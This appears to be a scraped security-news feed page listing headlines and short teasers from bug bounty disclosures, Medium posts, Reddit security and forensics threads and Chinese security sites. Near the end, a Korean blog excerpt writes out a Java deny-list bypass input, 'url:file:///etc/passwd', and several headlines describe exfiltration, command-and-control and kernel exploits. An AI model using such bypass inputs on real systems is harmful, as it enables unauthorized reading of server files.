    虚拟货币已成为BO彩平台充值、提现通道的“宠儿”,原先占主要地位的微信、支付宝等第三方充值方式,在某些BO彩平台逐渐销声匿迹。
    HTTP和HTTPS,六大常见问题
    有人对于HTTP和HTTPS,发出了疑问,小编收集了几个常见的问题,为您解答,希望在最大程度上帮助到您,让您更深层次了解HTTP与HTTPS。
    APT29 以疫情为话题攻击大使馆相关人员
    最近,APT29 又转换了攻击目标,将视线从SloarWinds转移到了大使馆。
    模块化银行木马IcedID 新变种浮出水面
    IcedID 是最早在 2017 年被披露的模块化银行木马,也是近年来最流行的恶意软件家族之一。
    干货 | 金融行业共享数据错综复杂,如何强化数据安全根基?
    数据分类分级能够有效促进金融数据在机构间、行业内的安全共享,有利于金融行业数据价值的挖掘与实现。

  • Open

    IDOR delete any Tickets on ads.tiktok.com
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1475520 - Bounty: $5000
    Open Redirect TO Stealing aadvid
    TikTok disclosed a bug submitted by lu3ky-13: https://hackerone.com/reports/1378533 - Bounty: $500
    Reflected XSS on www.pornhub.com and www.pornhubpremium.com
    Pornhub disclosed a bug submitted by wh0ru: https://hackerone.com/reports/1354161 - Bounty: $750
  • Open

    4300$ Instagram IDOR Bug (2022)
    Hello everyone! Today im going to explain how i found a 4300$ IDOR Bug on Instagram. Continue reading on Medium »
    My personal favourite top 20 hacking tools.
    1. Nmap (Network Mapper) Continue reading on Medium »
    What is the John The Riper(JTR)? How to use JTR?
    What is the John The Riper? Continue reading on Medium »
    How did I find Directory Traversal attack using GitHub
    Hello, Continue reading on Medium »
    Bug Bounty — How to approach Vulnerabilities ( PART 1 )
    Hello people, it’s me again. In most cases, with automated tools, you can possibly find low level security bugs i.e most likely Blind XSS… Continue reading on Medium »
    IDOR in support.mozilla.org through Code Review
    I was trying to improve my static analysis code, specifically django apps, so i decided to hack a random project in github. And i found… Continue reading on Medium »
    Community Newsletter — March 2022
    As the Pandora community continues to grow stronger with each passing day, we would like to take this opportunity to thank everyone for… Continue reading on Pandora Protocol »
    Do data practitioners are the new (security) weakest link?
    Secrets in code Continue reading on CodeX »
    Business Logic Bug| Email Existing Bypass | Running 2 accounts with a single email
    Vulnerability Category: Business Logic Error Continue reading on Medium »
    Find bugs by Google dork method
    Cre : https://medium.com/@fcwdbrqmr/400-bounty-again-using-google-dorks-6dc8e438f017 Continue reading on Medium »
  • Open

    Could artifacts be missing from Magnet Axiom?
    Hi there, hoping some of you are Magnet Axiom users and may be able to help me with this conundrum I have *some nonessential information has been altered for protection*: I have received a Portable Case from someone who has full license to the platform. I understand how the Portable Case is created (via watching the Magnet tutorial videos). The Portable Case is supposed to contain the contents of John Doe's cell phone. Separately, I have Snapchat Returns for John Doe's Snapchat account, and as far as is known John Doe only owned the one aforementioned cell phone. In looking at the Artifacts in the Portable Case, there seem to be things missing. For example: The Portable Case is supposed to cover a time period of 01/01/2XXX through 05/15/2XXX. When comparing the Snapchat Returns > Snapchat Memories I am able to see a specific video file - I'll call it "Selfie A" - from 02/03/2XXX 08-48-56 UTC. But when looking at the Portable Case > CHAT > Snapchat Memories artifacts there is no corresponding artifact. There are other video artifacts from that same date and around that time, but not "Selfie A." There are many files I have identified with this same issue. So now the question: I will admit I have not had formal training on Axiom (nor am I a digital forensics professional by trade) so I am willing to withhold suspicion for now, but, is it possible that artifacts could appear from Snapchat Returns that were missed in Axiom? Maybe "Selfie A" was deleted from the phone so it doesn't appear in Axiom but it does appear in the Returns data from Snapchat? (I hate even typing that question because I know even "deleted" things can be forensically recovered but go with me here). Or, is it more likely that the "Selfie A" artifact is visible in the Snapchat Returns but not in the Portable Case because the creator of said Portable Case chose not to include the artifact? submitted by /u/mclaughlinkessell [link] [comments]
    Tips on the GDAT certification (SEC599)
    Hi all, I have just enrolled for the SEC599 (OnDemand) and will be going through the GDAT exam as well. Are there any tips which could help me prepare better and pass the exam? My intro - Have been into SOC and IR for 5+ years now, and this is going to be my first certification submitted by /u/Suchi-Bee [link] [comments]
    Pagefile/ Cache question
    Hey Guys I work in law and as you probably have experienced we are stunningly ignorant on computer forensics. When I have a bit of time I like to research various computer forensic things and evidence from browsers are quite fascinating to me. I have two questions that I'd love help answering. 1) I'm assuming that this is a stupid/ basic question but I read that pictures in the cache are copies of the original essentially and as such they would contain meta data like locations and so on, is that also correct for stuff in the pagefile? 2) I've messed around with the belkasoft software trail run to view the pagefile on my PC, the categories that the data is broken up into is fairly understandable browsers, instant messengers. And they contain images and urls. However there is a category called other files and I'm not sure what is contained in them? submitted by /u/curiousstudent99l [link] [comments]
  • Open

    Thought this might be of interest
    ​ ​ https://46.mangovideo.pw/contents/videos/ http://server217.mangovideo.pw/contents/videos/ https://177.mangovideo.pw/contents/videos/ https://68.mangovideo.pw/contents/videos/ https://server9.mangovideo.pw/contents/videos/ https://45.mangovideo.pw/contents/videos/ https://new.mangovideo.pw/contents/videos/ https://5.mangovideo.pw/contents/videos/ https://234.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ https://31.mangovideo.pw/contents/videos/ https://60.mangovideo.pw/contents/videos/ https://s10.mangovideo.pw/contents/videos/ https://183.mangovideo.pw/contents/videos/ submitted by /u/TiThelis [link] [comments]
    CALISHOT 2022-03: Find ebooks amongst 395 Calibre sites this month.
    submitted by /u/throwaway176535 [link] [comments]
  • Open

    If you change the SIM card, google will automatically add that number to your google account.
    A tech at Verizon put his personal SIM in my phone to see if it could support the network. I'm attempting to change from ATT to Verizon on my unlocked android phone. A little while later, a notification from google that his personal phone number has been added to my Google account(s), alongside my own phone #. Does this mean that you can access someone's Google account(s) by surreptitiously inserting a SIM into their phone, even if you don't have their pin# or severed finger? submitted by /u/Dougolicious [link] [comments]
    Ghosted after vulnerability disclosure
    I recently disclosed a unauthenticated RCE to a company that provides virtual network appliances, the process was going good and they patched the vulnerability, but upon my request for patch release/notes they ghosted me. I already have CVE numbers assigned but would like to have mitre publish them but don't know what to do if the company is not being cooperative, anyone have any suggestions? submitted by /u/BasedThug [link] [comments]
    Should I pursue the OSCP certification?
    I have 6 years of experience as a software engineer, and recently started working as an Application Security Engineer doing mostly static and dynamic analysis of our apps. I have plenty of books and online courses to work through, and recently started tinkering with HackTheBox. I thought about pursuing the OSCP cert. Realistically with a full-time security job and other obligations I probably won't be able to commit all my spare time to this, so the 30/60/90 day lab access periods probably won't be enough time to finish the course. The 1 year long lab access is $2500, which is quite a steep price. I'm curious to know if the OSCP training will benefit me in a way that my job and HackTheBox won't. submitted by /u/cppnewb [link] [comments]
    ISO 27001:2021 GAP analysis
    Hi , I'm working for a company which is ISO 27001:2013 certified and i was asked to do a GAP analysis on ISO 27001:2021 stranded. So If there are any useful article or any references , please share it. TIA submitted by /u/darkwolf-95 [link] [comments]
    Thoughts on Kaspersky AV/Anti-malware after recent events?
    Hey all, Wondering what your thoughts are on kaspersky as an AV tool, and as a company given recent events. Do you think with all the independent reviewers that they could still be compromised by say KGB/Russian government? Sorry, not trying to be political, but the recent events can be directly tied to multiple netsec topics. submitted by /u/Fizgriz [link] [comments]
  • Open

    moodle 2nd order sqli 0-day
    submitted by /u/mufinnnnnnn [link] [comments]
    How to analyze malicious documents – Case study of an attack targeting Ukrainian Organizations
    submitted by /u/CyberMasterV [link] [comments]
    Guardio security team discovered an active network of sophisticated crypto attacks targeting the MetaMask wallet
    submitted by /u/oldrobgin [link] [comments]
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    submitted by /u/cyberbutler [link] [comments]
  • Open

    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-02 Review
    合作方数据安全闭环管理实践 by ourren 更多最新文章,请访问SecWiki
  • Open

    Bash Tricks for File Exfiltration over HTTP/S using Flask
    This post outlines techniques to exfiltrate files using curl and encode, encrypt, and save captured files using a custom Flask Web Server Continue reading on Maveris Labs »
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    Driver from HackTheBox — Detailed Walkthrough
    No content preview
  • Open

    My First Osint Challenge
    One fine day I was Scrolling through tweets and my eyes got a tweet that Dan Conn tweeted a osint challenge on Oct 5, 2021 mentioning his… Continue reading on Medium »
    Maltego OSINT Tool Intro
    Maltego is a tool for OSINT and visual link analysis. It can pull data from multiple sources to explore the properties of entities and the… Continue reading on Medium »
    Working with your own data: tips and tricks to kickstart your analytical task
    Our recent articles mostly tell about Lampyre’s OSINT capabilities. This one will be different as it describes the data analysis side of… Continue reading on Medium »
  • Open

    Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization
    Scans of more than 200,000 infusion pumps on the networks of hospitals and other healthcare organizations found 75% had known security gaps. The post Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization appeared first on Unit42.
  • Open

    FreeBuf早报 | 乌研究员泄露 Conti 勒索软件源代码;苹果禁用俄 iPhone 核心功能
    苹果表示,在俄罗斯对乌克兰发动攻击后,它已经停止在俄罗斯销售其产品并限制苹果支付功能。
    快速定位挖矿木马!
    挖矿木马最大的一个特征就是cpu资源占用非常高,top命令查看cpu情况,可以看出xmr这个进程占用cpu资源很高。
    什么是SDK,它是怎样威胁我们的隐私?
    截至目前,尚有107款APP未完成整改,洋码头、中公教育等APP在列。
  • Open

    Exposing the Conti Ransomware Gang - An OSINT Analysis
    UPDATE:The following set of graphics aims to visualize the recently leaked Conti ransomware gang members conversations.UPDATE:The following is a complete list of all the Bitcoin addresses used by the Conti ransomware gang members obtained using public

  • Open

    4 Weeks to prep for GCFA
    Is this even possible? I was given the material yesterday. I have some training under my belt, but overall still a noob when it comes to DFIR. Currently sitting through a 6 day course with a SANS instructor, but I feel like I am getting the exact same information from just reading the books. My experience in IT is less than 2 years and all training. Sec+ being my only previous cert. submitted by /u/SnooDogs3246 [link] [comments]
    ASK ALL NON-FORENSIC DATA RECOVERY QUESTIONS HERE
    This is where all non-forensic data recovery questions should be asked. Please see below for examples of non-forensic data recovery questions that are welcome as comments within this post but are NOT welcome as posts in our subreddit: My phone broke. Can you help me recover/backup my contacts and text messages? I accidently wiped my hard drive. Can you help me recover my files? I lost messages on Instagram, SnapChat, Facebook, ect. Can you help me recover them? Please note that your question is far more likely to be answered if you describe the whole context of the situation and include as many technical details as possible. One or two sentence questions (such as the ones above) are permissible but are likely to be ignored by our community members as they do not contain the information needed to answer your question. A good example of a non-forensic data recovery question that is detailed enough to be answered is listed below: "Hello. My kid was playing around on my laptop and deleted a very important Microsoft Word document that I had saved on my desktop. I checked the recycle bin and its not there. My laptop is a Dell Inspiron 15 3000 with a 256gb SSD as the main drive and has Windows 10 installed on it. Is there any advice you can give that will help me recover it?" After replying to this post with a non-forensic data recovery question, you might also want to check out r/datarecovery since that subreddit is devoted specifically to answering questions such as the ones asked in this post. submitted by /u/AutoModerator [link] [comments]
    Answering general digital investigation questions
    Last week we ran a stream about forensic hardware and got A LOT of general digital forensic questions. It might be interesting to anyone new to computer forensics. Use the chapter times in the video description to jump around. We also talk about hardware write blockers and forensic imagers. https://youtu.be/O1bZvGqmP1Y submitted by /u/DFIRScience [link] [comments]
    Incident Responder looking to transition into a digital forensics role
    Hello everyone! I have worked in infosec and IT for 6 years in incident response roles for companies ranging from startups to fortune 50. I currently work at a startup local cybersecurity firm where I am an incident response engineer and consultant. I handle everything on the IR side including ransomware cases, business email compromise, data theft, threat hunting, and compromise assessments. I also have my GSEC, GCIH, GCFE, and GCFA certifications. I love what I do, but I am burnt out. I’m tired of being on call 24/7/365, never being able to bring any of the criminals I work against to justice, and much more. My family and I are settling down, and I am interested in transitioning to a more traditional digital forensics role working on criminal cases. I want to have a more steady, stable case load, and actually see the results of my work helping bring people to justice. I was wondering if any of you have made a similar transition, and if there are any recommendations or insights that could help me make this switch. I have read the FAQ here and am looking for new jobs in this space, but would love to get some input from this community. Any thoughts? submitted by /u/horizon44 [link] [comments]
    What are some good triage tools for live MacOS and Linux systems?
    A customizable hash list is a must! Thanks submitted by /u/DHZX [link] [comments]
    Homework Help in HxD
    submitted by /u/Flaky_Tonight3305 [link] [comments]
  • Open

    Open Directories Kodi addon for version 19 Matrix?
    Anybody know where there is an updated version of the open directories addon for Kodi? We had an addon for Kodi version 18 Leia, but since that version relied on python 2, we now need an updated version for python 3. Or something similar. submitted by /u/studio222 [link] [comments]
    Collection of vintage video game and pc commercials
    http://ftp.kameli.net/pub/pkpvideos/ submitted by /u/inoculatemedia [link] [comments]
    Ministry of Economic Development of Russia Leaked by anonymous
    The sites seem to be down but I will provide the links in case they are back on. https://old.economy.gov.ru/minec/resources/ https://old.economy.gov.ru/wps/wcm/connect/economylib4/designElements/resources/ These are the tweets that link me there: https://twitter.com/youranonone/status/1498685800241934342?s=21 https://twitter.com/anonymous_link/status/1498607316836536320?s=21 submitted by /u/__babygiraffe__ [link] [comments]
  • Open

    Which is the efficient way to practice web application security?
    I read two books about web application security. Web Application Security: Exploitation and Countermeasures for Modern Web Applications Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities But I didn't practice enough. I have multiple options to practice it Port Swigger Web Security Academy bWAPP Vulnerability Disclosure Programs on HackerOne As I said I already read books about this topic, maybe I don't need to read PortSwigger Academy Articles. bWAPP is good but it consists lots of vulnerabilities and I can't figure out how to prepare a work plan for that (Because of vulnerability count and expertise levels). VDPs on HackerOne are good because they are real-life challenges but I don't even know I am ready or not for testing real applications. I am open to any advice. submitted by /u/pacman0026 [link] [comments]
    Options for a malware sandbox with Internet access
    I am looking for a solution to work with and detonate potentially malicious files & malware. A isolated (from rest of LAN) malware sandbox .. with Internet access. I have been considering a Type 2 hypervisor such as VirtualBox running Windows 10 Pro. it seems if I go with this solution I may need a 2nd VM running a Firewall to ensure the Win10VM cannot spread malware to other devices on the LAN. Seeking input on other methods or options to build such a environment. submitted by /u/q_logsource [link] [comments]
    Help to improve AKS Pod's security
    Hello. I want to use Azure Kubernetes environment for running Azure DevOps build agents. Besides, tried to make the environment secure, by following the principle of least privilege. As a result - Dockerfile and Pod's definition which runs container as an unprivileged user (nobody) on a read only filesystem (except /tmp and /azp paths). What else could be done to improve environment's security? submitted by /u/groovy-sky [link] [comments]
    How do you organize your study?
    Currently I work as SOC analyst, I do like studying and coding, so after work I usually study some stuff related to security, but from time to time I find myself starting new courses without finishing anything, and read about different topics, but can't focus, which waste much time and effort. I'm not sure if anyone else faces the same issue and how can I focus more? submitted by /u/xoutisx [link] [comments]
    What are the biggest barriers stopping NetSec from going into Virtual Reality?
    Specifically, imagine a Virtual Reality tool that would allow you to navigate your entire network in a three dimensional space, to detect vulnerabilities and such. The first barrier that comes to mind would be cost of equipment, especially if organizations need to buy multiple headsets for their employees. But what other barriers do you forsee? VR is already pretty popular, so I'm surprised its not already more adopted in this space. Disclaimer: I work for a VR startup in the NetSec space and we are trying to gather feedback from NetSec professionals. You can visit our website if you want to learn more, we are offering headsets in exchange for good user feedback. There's a survey link on our contact us page: https://valkure.com TIA submitted by /u/loshofficial [link] [comments]
    Entire infosec team replaced by... IT team?
    Anyone ever experience this? I'm the last technical infosec person left on a former team of ~14 people. Now we have replaced the entire infosec team with IT/non-infosec people, who are all basically entry-level in infosec, although they may have skills in other areas such as IT/cloud. I feel genuinely concerned because it's clear none of them have the skills, knowledge or experience to do anything in these job functions security wise. They are just having tons of random meetings to try and figure out what to do next, and not actually getting anything done. They've been "talking" about what to do for 9 months. It's starting to feel like a scam, and I'm having to hold people's hands with extremely basic scripting and technical tasks. At first it was cool, because I had the opportunity to mentor them, but NOTHING is getting done. What the hell is going on? submitted by /u/netipotty [link] [comments]
    Is whitelisting DNS zones to prevent DNS tunneling viable? Why is it not more common?
    I'm concerned about malware which uses DNS channels to communicate home. I'm thinking about ways to mitigate this threat for my servers, and the most obvious measure that comes to mind, is to have my DNS resolver block recursive lookups to zones which are not whitelisted. So, the plan is to (1) make my firewall block all DNS traffic from my server except to my own resolver, and (2) have my own resolver block all lookups to non-whitelisted zones. So e.g., a lookup to *.microsoft.com would be recursively resolved, but not a lookup to *.evildomain.com. When Google searching for ways to mitigate DNS tunneling, this is not a commonly suggested countermeasure. Most blogs and articles answer this question by referring to some expensive, "smart", enterprisey DNS filter. Is my countermeasure less easy than it sounds? If not, why is this countermeasure not more common? submitted by /u/engineerL [link] [comments]
    What is the most difficult part of being a SOC Analyst?
    Every job has pros and cons. What do you think about being a SOC analyst? A lot of people are saying about stress and over working. Maybe it's not worth being a SOC analyst? What do you guys think? submitted by /u/umuttosun [link] [comments]
    How to test our AV/EDR
    So if I remember well, a few years ago there were dedicated scripts and binaries to test if your AV/EDR works well, but I can’t find that anywhere. Do you have recommendations for that? What I’d like is to go a bit further than just compiling and running netcat/mimikatz… which would not involve running MSF modules at all. submitted by /u/EsreverEngineering [link] [comments]
    Not getting methodological approach to information audit. What are they trying to say?
    https://www.reddit.com/r/audit/comments/t47la5/not_getting_methodological_approach_to/ submitted by /u/whatusernameiscool [link] [comments]
    How do cybercriminals/"hackers" defend themselves?
    I've always been puzzled by the idea that hackers are vulnerable themselves? Like how can one say they are 100% defended from counter-attack? In any reading/research on cyber-defence I've ever done, the idea is you can never be 100% secure. Is it like an arms race of being "cleverer" than whoever might be on the counter-attack? Not sure if anyone can shed insight on this - thanks \editing post to say you can never be 100% secure, previously I had 10%) submitted by /u/mdgsec [link] [comments]
    Getting Started on Pentesting an IOT Device
    I'm relatively inexperienced at security and am trying to improve my skills. I have a custom made IOT device at home which I am trying to find vulnerabilities in and am looking for suggestions of what to investigate. I scanned with nmap using script=vulners. Only port 22 is open and there are a few vulnerabilities (OpenSSH 7.9p1) but nothing very promising as far as I can tell. Brute-forcing the SSH password using Hydra is also not very promising as it is fairly slow and I know the device has a reasonably complex password which is not in common password lists like rockyou. Any suggestions on other approaches to find vulnerabilities in the device? submitted by /u/MrKhutz [link] [comments]
    What is vulnerability sweeping?
    I was asked the question what vulnerability sweeping, but I can't seem to find a definitive answer for it, only definitions for vulnerability scanning. submitted by /u/pleaseweallneedhelp [link] [comments]
  • Open

    Protests against Russia’s attack on Ukraine + more
    the discursus Protest Analytics newsletter, March 1st, 2022 edition. Continue reading on discursus.io »
    The Ides of March: Fall of the Russian Bear?
    A critical update has come across my feed. The New York Times lost the lede in a story today. Continue reading on Medium »
    Verify Viral Photos with Reverse Search
    How to use Google Reverse Image Search to verify the source of photos from Ukraine Russian conflict. Continue reading on Medium »
  • Open

    5 New Vulnerabilities in PJSIP Multimedia Library, including RCE
    submitted by /u/SRMish3 [link] [comments]
    Triaging A Malicious Docker Container
    submitted by /u/MiguelHzBz [link] [comments]
    Multiple vulnerabilities found in voip monitor by an Ethiopian Security firm
    submitted by /u/nathanAbejeM [link] [comments]
    TeaBot is now spreading across the globe | Cleafy Labs
    submitted by /u/f3d_0x0 [link] [comments]
    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    submitted by /u/hardenedvault [link] [comments]
  • Open

    MySQL DUMPFILE
    Este artigo tem como objetivo reforçar a importância da realização do hardening e/ou revisão de segurança antes de colocar um servidor de… Continue reading on 100security »
    Analysis of a trojanized anydesk
    This blog provides a detailed analysis of anydesk application that has been trojanized and distributed from a ranked unofficial website… Continue reading on Medium »
  • Open

    Password Reset to Admin Access
    While testing a web application that used a web GUI over the top of an API, I noted the calls to the API where authorized with a JWT token… Continue reading on Techiepedia »
    What After 12th? as an Ethical Hacker.
    This is not an accurate path for an ethical hacker. Continue reading on Medium »
    No Rate Limiting on Forget Password Page (Email Triggering)
    Vulnerability Category: A6- Security Misconfiguration Continue reading on Medium »
    Facing Issues with Nuclei upgrade??
    Few weeks back, I too faced the same situation. Tried multiple ways to upgrade my Nuclei version but it just got stuck at version 2.2.0… Continue reading on Medium »
    On the way to 2nd Bounty XSS and Apache server .
    Hello readers, in this post, we’ll look at XSS and Apache Server furthere on apache server I will post another article. Continue reading on Medium »
  • Open

    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-03-01 Review
    聊一聊《Bvp47 美国NSA方程式的顶级后门》中的BPF隐藏信道 by ourren DICOS:在Stack Overflow社区不安全代码发现方法 by ourren 2022年最热安全技术"BAS"详解 by ourren 更多最新文章,请访问SecWiki
  • Open

    在线社交网络中识别虚假个人资料的动态CNN模型
    在线社交网络 (OSN) 是用于共享各种数据(包括文本、照片和视频)的流行应用程序。 然而,假账户问题是当前 OSN 系统的障碍之一。 攻击者利用虚假帐户分发误导性信息,例如恶意软件、病毒或恶意 UR
    算法推荐管理规定3月1日施行,算法备案系统正式上线
    《规定》明确,应用算法推荐技术,是指利用生成合成类、个性化推送类、排序精选类、检索过滤类、调度决策类等算法技术向用户提供信息。
    Conti支持俄罗斯,乌克兰成员公布了其内部聊天记录
    就在Conti 勒索组织选择支持俄罗斯之后,一名乌克兰籍的成员泄露了6万多条Conti 勒索组织内部聊天的消息。
    FreeBuf早报 | 保险业巨头 AON 周末遭遇网络攻击;莫斯科交易所被网络攻击击落
    微软透露,在入侵前几个小时,乌克兰实体成为了先前未被发现的恶意软件 FoxBlade 的攻击目标。Microsoft 威胁情报中心 (MSTIC) 继续调查针对...的攻击。
    保险业巨头 AON 遭网络攻击
    AON披露他们在2022年2月25日遭受了网络攻击,在报告中,除了发生攻击并影响了有限数量的系统外,AON 没有提供额外的消息。
    丰田日本工厂因供应商遭受网络攻击而停止生产
    因为丰田汽车提供内外饰塑料部件的供应商小岛工业因遭网络攻击,丰田在日工厂从3月1日起暂停生产。
    网络战发展成“第五战场”,这些数据告诉你乌克兰的网络现状
    网络战已经发展成与海、陆、空、天等领域具有相同的领域地位,也被列为“第五战场”。
  • Open

    Demonstration of how use Counter-Strike 1.6 as Malware C2
    If you're a malware operator who likes to Rush B and want to manage your victims while playing games, this is for you. https://www.youtube.com/watch?v=b2L1lWtwBiI&t=1s https://twitter.com/kaganisildak/status/1498585440680656896 submitted by /u/kaganisildak [link] [comments]
  • Open

    Session Fixation on Acronis
    Acronis disclosed a bug submitted by hatnare: https://hackerone.com/reports/1486341
  • Open

    Exploiting CVE-2021-26708 (Linux kernel) with sshd
    Article URL: https://hardenedvault.net/2022/03/01/poc-cve-2021-26708.html Comments URL: https://news.ycombinator.com/item?id=30511060 Points: 2 # Comments: 0
  • Open

    Windows Exploitation Research
    Hi, I am starting windows security research to understand how windows internals works and how one can exploit it. If anyone interested he/she can DM me submitted by /u/i_whiteheart [link] [comments]
  • Open

    Samsung Encryption Vulnerability [pdf]
    Article URL: https://eprint.iacr.org/2022/208.pdf Comments URL: https://news.ycombinator.com/item?id=30510543 Points: 1 # Comments: 0

  • Open

    Essential Skills to be a SOC Analyst
    Hi all, This video covers what the essential mindsets are to be an effective SOC analyst. It covers WHAT the mindsets are, WHY they are relevant to a SOC analyst, and HOW these mindsets can be developed. This is far more important than technical skills which can be taught. So, if you are a ‘new’ or aspiring analyst, or an experienced senior analyst, or even if you are on the periphery of cyber security in IT or are just curious, this video will have something for you. Happy Cybering! https://youtu.be/HOFfYUd7DbE submitted by /u/SyPy [link] [comments]
    how to deal with phishing email in a big company?
    I'm a new graduate and I had a job interview for a soc analyst position, one of the question that kinda confused me is "how do you identify and deal with phishing emails?". First I answered with the basic clues: weird email address; unknown domain; bad grammar/spelling; no asking for sensitive data; no shady urls/files and use plugins to analyse the emails. But they told me what if the email seems perfect, like a gmail domain, good spelling and formatting and no urls or files attached. In my mind I'm thinking so how is this a phishing email if there is nothing suspicious in it. But I still tried to answer saying that you can teach your employees to be aware of such emails and to report them to the security team in case they find a suspicious email.They answered what if they company has thousands of employees, how is the security team gonna deal with potential hundreds of emails from the employees. At this point I got nothing else to say, what am I supposed to answer in this situation? thanks. submitted by /u/Dalleuh [link] [comments]
    Third party library license risk with Single Page Applications
    Many open source licenses have different rules depending on if the library is used with a SaaS product or an Externally deployed product. Does using an open source library within a Single Page Application architect mean the library is now deployed to the users browser and thus is externally deployed? submitted by /u/jrminty [link] [comments]
    Struggling to learn networks,can i learn it through programming and GNS3?
    Hi,so on my last infosec interview the guy told me to study more networks,and he suggested studying the content of Network+ . I am trying to learn from Mike Myers ‘s course but struggling badly. There are a lot of theories here and i keep missing a lot of points . So i want to learn it more practically and in parallel learn the theories. I am good with programming and i have GNS3. So my question,can i learn networking and network+ content through network programming and gns3 ? submitted by /u/Ramseesthe4th [link] [comments]
  • Open

    Google Dork nedir ve nasil kullanılır?
    OSINT teknikleri Continue reading on Medium »
  • Open

    The (Mis)Use of Artifact Categories
    Very often in DFIR, we categorize artifacts in an easy-to-understand and easy-to-digest manner, as using or relying on these categories often helps us navigate our investigations. There are also times when we reduce those artifacts to a level where they're easier to understand, and in doing so, the categorization of the artifact isn't quite accurate. As such, it's necessary now and again to go back and take a look at that categorization to determine if still holds, or if it truly served the community in the manner intended. SPOILER ALERT - TL:DR  Within the DFIR community, we should not be hanging investigation findings on single artifacts in isolation. If there are gaps in data, they need to be recognized, understood and communicated. Do not spackle those gaps over with guesswork and assu…
  • Open

    Breaking Google’s ReCaptcha v2 using.. Google.. Again
    submitted by /u/n0llbyte [link] [comments]
    Rouge RDP: New Initial Access Technique via RDP Bypassing Clients/Servers/Security Vendors
    submitted by /u/ustayready [link] [comments]
    Alan c2 Framework v6.0: Alan + JavaScript = ♡
    submitted by /u/aparata_s4tan [link] [comments]
  • Open

    Phishing
    In the digital world everyone using smart device for day to day activity. We’re sharing many information, at the same time receiving many… Continue reading on Medium »
    BYPASS AMSI
    Cocinando nuestra receta con powershell y c# Continue reading on Medium »
  • Open

    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password.
    Does anyone know how I can mount a raw/image that is encrypted with LUKS? I have the decryption password. submitted by /u/rvndomus3r2019 [link] [comments]
    Is there a way to find out whether the timestamp on a file has been modified?
    I knows it's very easy to modify "Date created" "Date Modified" attribute of a file. Is there any way to know if thee timestamps had been modified? Can I look at list of dates modified? Any logs or tools? Before someone suggests it back up wont help because the last VSS available is before the file was initially created. The file was created within the last 14 days, I have reason to believe that the date has been modified. ​ I'd really appreciate the help. submitted by /u/Serious_Mongoose_522 [link] [comments]
    Let's Talk About NTFS Index Attributes
    Good morning, It’s time for a new 13Cubed episode! Let’s revisit a critical NTFS artifact: NTFS Index Attributes (also referred to as $I30 files). We'll cover all of the information you need to know, and take a look at a new tool called INDXRipper. Episode: https://www.youtube.com/watch?v=x-M-wyq3BXA Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    microscopic aquatic animals
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Files from Cleveland State Community Collage
    http://www.clevelandstatecc.edu/content/ submitted by /u/depressedclassical [link] [comments]
    1980s and early 1990s software
    http://cd.textfiles.com/dfeno1/ submitted by /u/depressedclassical [link] [comments]
  • Open

    AlbusSec:- Penetration-List 04 File Inclusion
    Hello Members, I hope that you liked Penetration-List Project, Therefore, I worked hard to complete Penetration-list Project. Firstly, I… Continue reading on Medium »
    My Pentest Log -8-
    Greetings from Caenopolis to all, Continue reading on Medium »
    Jax.Network weekly update
    by Maryna Trifonova, Head of Content at Jax.Network Continue reading on Jax.Network Blog »
    How anyone could have gotten a free pass to attended @IWCON2022
    Recently I attended InfoSec Community (@InfoSecComm) ‘s security conference IWCON2022. Awesome conference and awesome experience attending… Continue reading on Medium »
    NMAP commands
    Basic Scan on a Single IP: Continue reading on Medium »
    Everything you need to know about Bug Bounties
    What are Bug Bounty Programs Continue reading on Medium »
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-02-28 Review
    SecWiki周刊(第417期) by ourren 以PoC迁移促进漏洞评估 by ourren 更多最新文章,请访问SecWiki
  • Open

    URL: prefix를 이용하여 Deny-list 기반 Protocol 검증 우회하기
    phithon_xg가 재미있는 트릭을 트윗에 공개했는데, 실제로 분석애서 유용하게 쓰일 수 있어 간단하게 정리해서 글로 공유드려봅니다. Bypass protocol check in Java 아래 url: 접두사가 있는 URL들은 Java URL에서 각각 http://, file:// 과 동일하게 동작합니다. 1 2 url:http://127.0.0.1:8080 url:file:///etc/passwd 그래서 만약에 deny-list 기반으로 프로토콜을 검증하고 있는 경우, 이러한 url 접두사를 통해 우회할 수 있는 포인트가 됩니다. 1 2 3 4 5 6 7 // check() 함수가 file://로 시작하는 url을 차단하는 함수라고 가정하고, // 만약 inputURL에 url:file:///sdcard/blahblah.
  • Open

    Climate Change 2022: Impacts, Adaptation and Vulnerability
    Article URL: https://www.ipcc.ch/report/ar6/wg2/ Comments URL: https://news.ycombinator.com/item?id=30500104 Points: 2 # Comments: 0
  • Open

    Stack-based Buffer Overflow Series (aimed at beginners)
    submitted by /u/_CryptoCat23 [link] [comments]
  • Open

    微众银行应用安全团队招聘 | 深圳
    微众银行应用安全团队招聘应用安全岗
    乌克兰招募 "IT军 ",俄罗斯 31 实体成为攻击目标
    乌克兰意图组建一支志愿 &amp;amp;amp;quot;IT军队&amp;amp;amp;quot;,对俄罗斯进行网络攻击。
    FreeBuf早报 | Meta封锁俄在乌的官媒体账户;伊朗黑客组织使用新型恶意软件攻击
    乌克兰正在招募一支由白帽黑客组成的志愿IT军队,以对一系列俄罗斯实体发起攻击。
    通配符SSL证书的好处及选购方法
